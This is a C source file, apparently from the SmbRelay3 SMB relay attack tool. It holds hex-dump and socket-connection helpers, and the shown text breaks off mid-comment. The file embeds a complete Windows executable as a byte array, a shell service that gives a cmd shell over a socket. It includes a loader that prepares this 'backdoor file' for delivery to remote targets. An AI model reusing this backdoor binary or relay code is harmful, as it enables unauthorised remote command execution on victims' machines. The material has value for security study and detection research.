#include "misc.h"
#include "smbrelay.h"
#ifndef WIN32
#include <unistd.h>   /* close(): POSIX socket cleanup in ConnectToRemoteHost */
#endif
00007
/* Verbosity level, defined in another translation unit. Note that CleanLine()
 * below takes a parameter of the same name, which shadows this global there. */
extern int verbose;
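#ifndef DBG_DUMP_ROWS
#define DBG_DUMP_ROWS 16   /* normally supplied by the project header; 16 matches the row stride the original hard-coded */
#endif

/*
 * Print one hex-dump row to stdout: "OFFSET: ", DBG_DUMP_ROWS hex cells
 * (cells past `n` are blank-padded so the ASCII column stays aligned),
 * then " [ ascii ]". The two halves of the row are separated by an extra
 * space, in the hex cells and in the padding alike, so a trailing partial
 * row lines up with the full rows above it.
 *
 * row     first byte of the row (at least `n` readable bytes)
 * n       bytes actually present in this row, 0 <= n <= DBG_DUMP_ROWS
 * offset  byte offset of `row` within the dumped buffer, for the label
 */
static void DumpMemRow(const unsigned char *row, int n, int offset)
{
    int j;

    printf("%04x: ", offset);
    for (j = 0; j < DBG_DUMP_ROWS; j++) {
        if (j < n) {
            printf("%02x ", row[j]);
        } else {
            printf("   ");
        }
        if (j == DBG_DUMP_ROWS / 2 - 1) {
            printf(" ");
        }
    }
    printf(" [ ");
    for (j = 0; j < DBG_DUMP_ROWS; j++) {
        if (j >= n) {
            printf(" ");
        } else if (isprint(row[j])) {
            printf("%c", row[j]);
        } else {
            printf(".");
        }
    }
    printf(" ]\n");
}

/*
 * Hex/ASCII dump of `length` bytes starting at `string`, DBG_DUMP_ROWS bytes
 * per row, followed by one blank line. A NULL pointer or a non-positive
 * length prints only the blank line (the original printed just "\n" for
 * length <= 0 but would have dereferenced a NULL pointer).
 *
 * Changes from the original: the trailing partial row placed its half-row
 * separator after the 10th byte instead of the 8th; row offsets were
 * computed with a literal 16 regardless of DBG_DUMP_ROWS and printed
 * through "%hx" (wrapping above 0xffff); and an unused scratch copy of the
 * last row has been dropped.
 */
void DumpMem(void* string, int length)
{
    const unsigned char *p = (const unsigned char *) string;
    int offset;

    if (p == NULL || length <= 0) {
        printf("\n");
        return;
    }
    for (offset = 0; offset < length; offset += DBG_DUMP_ROWS) {
        int remaining = length - offset;
        DumpMemRow(p + offset, remaining < DBG_DUMP_ROWS ? remaining : DBG_DUMP_ROWS, offset);
    }
    printf("\n");
}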
00069
00070
00071
00072
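/*
 * Built-in fallback image, returned by ReadFileToSend() when the file named
 * by lpBackdoorFile cannot be read. Kept at file scope as a const table so
 * each call no longer initialises a 2 KiB copy on the stack.
 */
static const unsigned char SMRS[2048] = {
0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD0, 0x00, 0x00, 0x00,
0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68,
0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F,
0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20, 0x44, 0x4F, 0x53, 0x20,
0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x2F, 0xB0, 0x55, 0xC4, 0x6B, 0xD1, 0x3B, 0x97, 0x6B, 0xD1, 0x3B, 0x97, 0x6B, 0xD1, 0x3B, 0x97,
0x4C, 0x17, 0x46, 0x97, 0x6A, 0xD1, 0x3B, 0x97, 0x6B, 0xD1, 0x3A, 0x97, 0x6C, 0xD1, 0x3B, 0x97,
0xA8, 0xDE, 0x66, 0x97, 0x6E, 0xD1, 0x3B, 0x97, 0x4C, 0x17, 0x55, 0x97, 0x6A, 0xD1, 0x3B, 0x97,
0x4C, 0x17, 0x43, 0x97, 0x6A, 0xD1, 0x3B, 0x97, 0x52, 0x69, 0x63, 0x68, 0x6B, 0xD1, 0x3B, 0x97,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x50, 0x45, 0x00, 0x00, 0x4C, 0x01, 0x02, 0x00, 0x3E, 0x48, 0xFF, 0x47, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xE0, 0x00, 0x03, 0x01, 0x0B, 0x01, 0x08, 0x00, 0x00, 0x02, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x30, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x04,
0x00, 0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x5C, 0x20, 0x00, 0x00, 0x3C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00,
0x4B, 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x60,
0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0xF6, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x55, 0x8B, 0xEC, 0x81, 0xEC, 0xF4, 0x01, 0x00, 0x00, 0x53, 0x56, 0x57, 0x8D, 0x85, 0x0C, 0xFE,
0xFF, 0xFF, 0x50, 0x68, 0x01, 0x01, 0x00, 0x00, 0xFF, 0x15, 0x10, 0x20, 0x40, 0x00, 0x33, 0xF6,
0x56, 0x56, 0x56, 0x6A, 0x06, 0x6A, 0x01, 0x6A, 0x02, 0xFF, 0x15, 0x0C, 0x20, 0x40, 0x00, 0x8B,
0xF8, 0x6A, 0x10, 0x8D, 0x45, 0xF0, 0x50, 0x57, 0x66, 0xC7, 0x45, 0xF0, 0x02, 0x00, 0x66, 0xC7,
0x45, 0xF2, 0x1F, 0x90, 0x89, 0x75, 0xF4, 0xFF, 0x15, 0x08, 0x20, 0x40, 0x00, 0x6A, 0x01, 0x57,
0xFF, 0x15, 0x14, 0x20, 0x40, 0x00, 0x56, 0x8D, 0x45, 0xF0, 0x50, 0x57, 0xFF, 0x15, 0x18, 0x20,
0x40, 0x00, 0x56, 0xBB, 0x28, 0x20, 0x40, 0x00, 0x53, 0x8B, 0xF8, 0xE8, 0x50, 0x00, 0x00, 0x00,
0x59, 0x50, 0x53, 0x57, 0xFF, 0x15, 0x1C, 0x20, 0x40, 0x00, 0x8D, 0x45, 0x9C, 0x50, 0x8D, 0x45,
0xAC, 0x50, 0x56, 0x56, 0x56, 0x6A, 0x01, 0x56, 0x56, 0x68, 0x24, 0x20, 0x40, 0x00, 0x56, 0xC7,
0x45, 0xAC, 0x44, 0x00, 0x00, 0x00, 0x66, 0x89, 0x75, 0xDC, 0xC7, 0x45, 0xD8, 0x01, 0x01, 0x00,
0x00, 0x89, 0x7D, 0xEC, 0x89, 0x7D, 0xE8, 0x89, 0x7D, 0xE4, 0x89, 0x75, 0xB8, 0x89, 0x75, 0xB4,
0x89, 0x75, 0xE0, 0xFF, 0x15, 0x00, 0x20, 0x40, 0x00, 0x5F, 0x5E, 0x5B, 0xC9, 0xC2, 0x10, 0x00,
0x8B, 0x4C, 0x24, 0x04, 0xF7, 0xC1, 0x03, 0x00, 0x00, 0x00, 0x74, 0x24, 0x8A, 0x01, 0x83, 0xC1,
0x01, 0x84, 0xC0, 0x74, 0x4E, 0xF7, 0xC1, 0x03, 0x00, 0x00, 0x00, 0x75, 0xEF, 0x05, 0x00, 0x00,
0x00, 0x00, 0x8D, 0xA4, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8D, 0xA4, 0x24, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x01, 0xBA, 0xFF, 0xFE, 0xFE, 0x7E, 0x03, 0xD0, 0x83, 0xF0, 0xFF, 0x33, 0xC2, 0x83, 0xC1,
0x04, 0xA9, 0x00, 0x01, 0x01, 0x81, 0x74, 0xE8, 0x8B, 0x41, 0xFC, 0x84, 0xC0, 0x74, 0x32, 0x84,
0xE4, 0x74, 0x24, 0xA9, 0x00, 0x00, 0xFF, 0x00, 0x74, 0x13, 0xA9, 0x00, 0x00, 0x00, 0xFF, 0x74,
0x02, 0xEB, 0xCD, 0x8D, 0x41, 0xFF, 0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1, 0xC3, 0x8D, 0x41, 0xFE,
0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1, 0xC3, 0x8D, 0x41, 0xFD, 0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1,
0xC3, 0x8D, 0x41, 0xFC, 0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1, 0xC3, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xD6, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x80, 0xBC, 0x20, 0x00, 0x00,
0x73, 0x00, 0x00, 0x80, 0x0D, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x13, 0x00, 0x00, 0x80,
0x00, 0x00, 0x00, 0x00, 0x63, 0x6D, 0x64, 0x00, 0x53, 0x6D, 0x62, 0x52, 0x65, 0x6C, 0x61, 0x79,
0x33, 0x20, 0x53, 0x68, 0x65, 0x6C, 0x6C, 0x20, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x20,
0x2D, 0x20, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x74, 0x61, 0x72,
0x61, 0x73, 0x63, 0x6F, 0x2E, 0x6F, 0x72, 0x67, 0x20, 0x0A, 0x0A, 0x00, 0xA0, 0x20, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCA, 0x20, 0x00, 0x00, 0x08, 0x20, 0x00, 0x00,
0x98, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x20, 0x00, 0x00,
0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD6, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x02, 0x00, 0x00, 0x80, 0xBC, 0x20, 0x00, 0x00, 0x73, 0x00, 0x00, 0x80, 0x0D, 0x00, 0x00, 0x80,
0x01, 0x00, 0x00, 0x80, 0x13, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x57, 0x53,
0x41, 0x53, 0x6F, 0x63, 0x6B, 0x65, 0x74, 0x41, 0x00, 0x00, 0x57, 0x53, 0x32, 0x5F, 0x33, 0x32,
0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x00, 0x66, 0x00, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72,
0x6F, 0x63, 0x65, 0x73, 0x73, 0x41, 0x00, 0x00, 0x4B, 0x45, 0x52, 0x4E, 0x45, 0x4C, 0x33, 0x32,
0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

/*
 * Allocate and return a heap copy of the built-in SMRS image (caller frees).
 * On success *BackdoorFileSize (when non-NULL) is set to its length; the
 * original left the size untouched on this path, so callers saw a stale
 * or uninitialised value. Returns NULL only when malloc fails.
 */
static char *CopyCachedBackdoor(int *BackdoorFileSize)
{
    char *buffer = malloc(sizeof(SMRS));

    if (buffer) {
        memcpy(buffer, SMRS, sizeof(SMRS));
        if (BackdoorFileSize) {
            *BackdoorFileSize = (int)sizeof(SMRS);
        }
    }
    return buffer;
}

/*
 * Read the whole of lpBackdoorFile into a freshly malloc'd buffer and store
 * its length in *BackdoorFileSize. If the file cannot be opened, sized or
 * fully read, or is empty, a copy of the built-in SMRS image is returned
 * instead (with its size stored), mirroring the original's fallback for a
 * missing file. Returns NULL only when memory allocation fails; the caller
 * owns and frees the returned buffer.
 *
 * NOTE(review): a file longer than INT_MAX bytes would truncate when its
 * length is stored through the int out-parameter; no caller here shows
 * whether that is a realistic input.
 */
char *ReadFileToSend(int *BackdoorFileSize,char*lpBackdoorFile)
{
    FILE *fp;
    char *buffer;
    long len;

    fp = fopen(lpBackdoorFile, "rb");
    if (!fp) {
        printf("[-] %s not found. using cached version\n", lpBackdoorFile);
        return CopyCachedBackdoor(BackdoorFileSize);
    }

    /* ftell() returns -1 on error; a 0-length file is also treated as unusable. */
    if (fseek(fp, 0, SEEK_END) != 0 || (len = ftell(fp)) <= 0 || fseek(fp, 0, SEEK_SET) != 0) {
        printf("[-] %s unreadable or empty. using cached version\n", lpBackdoorFile);
        fclose(fp);
        return CopyCachedBackdoor(BackdoorFileSize);
    }

    buffer = malloc((size_t)len);
    if (!buffer) {
        fclose(fp);
        return NULL;
    }

    /* Read byte-wise so a short read is detectable (fread(buf, len, 1, fp) only reports 0 or 1). */
    if (fread(buffer, 1, (size_t)len, fp) != (size_t)len) {
        printf("[-] short read on %s. using cached version\n", lpBackdoorFile);
        free(buffer);
        fclose(fp);
        return CopyCachedBackdoor(BackdoorFileSize);
    }
    fclose(fp);

    if (BackdoorFileSize) {
        *BackdoorFileSize = (int)len;
    }
    return buffer;
}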
00223
00224
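/* True when socket() handed relay->destination a usable descriptor. */
static int RelayDestinationValid(const RELAY *relay)
{
#ifdef WIN32
    return relay->destination != INVALID_SOCKET;
#else
    return relay->destination >= 0;
#endif
}

/* Close relay->destination with the platform socket API (same WIN32/POSIX split the file uses elsewhere). */
static void CloseRelayDestination(RELAY *relay)
{
#ifdef WIN32
    closesocket(relay->destination);
#else
    close(relay->destination);
#endif
}

/* enable != 0 puts relay->destination into non-blocking mode, 0 restores blocking mode. */
static void SetRelayDestinationNonBlocking(RELAY *relay, int enable)
{
#ifdef WIN32
    u_long mode = (u_long)enable;
    ioctlsocket(relay->destination, FIONBIO, &mode);
#else
    int mode = enable;
    ioctl(relay->destination, FIONBIO, (char *)&mode);
#endif
}

/*
 * Fetch the error a non-blocking connect() left on relay->destination.
 * Returns 0 when the connection completed successfully, the pending socket
 * error otherwise, or -1 if getsockopt itself failed.
 */
static int PendingSocketError(RELAY *relay)
{
    int err = 0;
#ifdef WIN32
    int errlen = (int)sizeof(err);
    if (getsockopt(relay->destination, SOL_SOCKET, SO_ERROR, (char *)&err, &errlen) != 0) {
        return -1;
    }
#else
    socklen_t errlen = sizeof(err);
    if (getsockopt(relay->destination, SOL_SOCKET, SO_ERROR, &err, &errlen) != 0) {
        return -1;
    }
#endif
    return err;
}

/*
 * Resolve `hostname` (dotted quad or DNS name), fill relay->destinationaddr
 * and relay->hostname, and open a TCP connection to hostname:port with a
 * CONNECT_TIMEOUT-second limit. On success relay->destination holds the
 * connected socket in blocking mode and 1 is returned; on any failure 0 is
 * returned and no socket is left open.
 *
 * Changes from the original: the socket() result is checked; a completed-
 * but-failed connect is detected via SO_ERROR (on POSIX a refused
 * non-blocking connect also makes the socket writable, so select() alone
 * reported it as success); and the socket is closed on the failure path
 * instead of being leaked in relay->destination.
 */
int ConnectToRemoteHost(RELAY *relay,char *hostname, int port)
{
    fd_set fds;
    struct timeval tv;
    struct hostent *hostend;
    int i;

    relay->destinationaddr.sin_family = AF_INET;
    relay->destinationaddr.sin_addr.s_addr = inet_addr(hostname);
    if (relay->destinationaddr.sin_addr.s_addr == INADDR_NONE) {
        hostend = gethostbyname(hostname);
        /* Only a 4-byte IPv4 address fits the memcpy below. */
        if (!hostend || hostend->h_addrtype != AF_INET || hostend->h_length != 4) {
            return 0;
        }
        memcpy(&relay->destinationaddr.sin_addr.s_addr, hostend->h_addr, 4);
        printf("[+] Remote Server %s resolved as %s\n", hostname, inet_ntoa(relay->destinationaddr.sin_addr));
    }
    /* NOTE(review): unbounded copy of a caller-supplied string; bound it with
     * sizeof relay->hostname once RELAY confirms hostname is an array, not a pointer. */
    strcpy(relay->hostname, hostname);
    relay->destinationaddr.sin_port = htons((unsigned short)port);

    relay->destination = socket(AF_INET, SOCK_STREAM, 0);
    if (!RelayDestinationValid(relay)) {
        printf("[-] Error - socket() failed for %s:%i\n", hostname, port);
        return 0;
    }

    SetRelayDestinationNonBlocking(relay, 1);
    tv.tv_sec = CONNECT_TIMEOUT;
    tv.tv_usec = 0;
    FD_ZERO(&fds);
    FD_SET(relay->destination, &fds);

    /* Non-blocking connect returns at once; completion shows up as writability in select(). */
    connect(relay->destination, (struct sockaddr *)&relay->destinationaddr, sizeof(relay->destinationaddr));
    i = select((int)relay->destination + 1, 0, &fds, 0, &tv);
    if (i <= 0 || PendingSocketError(relay) != 0) {
        printf("[-] Error - Connection against %s:%i Failed\n", hostname, port);
        CloseRelayDestination(relay);
        return 0;
    }

    SetRelayDestinationNonBlocking(relay, 0);
    return 1;
}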
00278
00279
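/* enable != 0 puts `s` into non-blocking mode, 0 restores blocking mode (WIN32/POSIX split as elsewhere in this file). */
static void SetNonBlocking(SOCKET s, int enable)
{
#ifdef WIN32
    u_long mode = (u_long)enable;
    ioctlsocket(s, FIONBIO, &mode);
#else
    int mode = enable;
    ioctl(s, FIONBIO, (char *)&mode);
#endif
}

/*
 * Send all `n` bytes of `buf` on `s`, looping over partial sends.
 * Returns n on success (0 when n <= 0) or -1 if send() fails.
 */
static int SendAllBytes(SOCKET s, const char *buf, int n)
{
    int sent = 0;

    while (sent < n) {
        int r = (int)send(s, buf + sent, n - sent, 0);
        if (r <= 0) {
            return -1;
        }
        sent += r;
    }
    return sent;
}

/*
 * Send nBytes from `source` on `destination`, then read one response of at
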